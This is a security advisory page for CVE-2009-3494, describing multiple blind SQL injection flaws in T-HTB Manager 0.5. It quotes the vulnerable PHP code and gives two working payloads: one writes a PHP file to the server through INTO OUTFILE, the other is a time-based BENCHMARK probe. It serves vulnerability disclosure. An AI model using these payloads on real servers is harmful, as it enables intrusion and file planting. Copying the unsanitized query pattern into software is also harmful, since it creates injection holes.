T-HTB Manager Mutiple Blind SQL Injection

2009.10.04
Credit: Salvatore Fresta
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-3494
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

******** Salvatore "drosophila" Fresta ******** [+] Application: T-HTB Manager [+] Version: 0.5 [+] Website: http://sourceforge.net/apps/mediawiki/t-htbmanager/index.php?title=Main_ Page [+] Bugs: [A] Multiple Blind SQL Injection [+] Exploitation: Remote [+] Date: 10 Sep 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *************************************************** [+] Menu 1) Bugs 2) Code 3) Fix *************************************************** [+] Bugs - [A] Multiple Blind SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: index.php All fields in this script are not sanitized but any outputs aren't returned. ... case 'delete_category': $id = $_GET['id']; $id_interfaces = $_GET['id_interfaces']; if($id>0) { $query = "SELECT rgt, lft FROM ".$table_name." WHERE id='" . $id . "'"; $db_query = mysql_query($query); ... case 'update_category': $name = $_POST['name']; $id = $_POST['id']; $rate = $_POST['rate']; $ceil = $_POST['ceil']; $burst = $_POST['burst']; $prio = $_POST['prio']; $monitor = $_POST['monitor']; if(strlen($name)>0 && $id>0) { $nodelft = $_POST['nodelft']; $lft = $_POST['lft']; $rgt = $_POST['rgt']; $query = "UPDATE ".$table_name." set name='" . $name . "' , lft='" . $lft . "' , rgt = '" . $rgt . "', rate= '" . $rate . "', ceil = '" . $ceil . "', burst = '" . $burst . "', prio = '" . $prio . "', monitor = '" . $monitor . "' WHERE id='" . $id . "'"; ... And many others.. *************************************************** [+] Code - [A] Multiple Blind SQL Injection This is a Blind SQL Injection bug but into the database there aren't very reserved information such as usernames and/or passwords. However this injection can be used to write arbitrary files on the server (when allowed). http://site/path/index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTO OUTFILE '/tmp/file.php Send it as a POST packet: action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23 *************************************************** [+] Fix No fix. ***************************************************

References:

http://xforce.iss.net/xforce/xfdb/53145
http://www.securityfocus.com/archive/1/archive/1/506386/100/0/threaded
http://www.milw0rm.com/exploits/9637


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top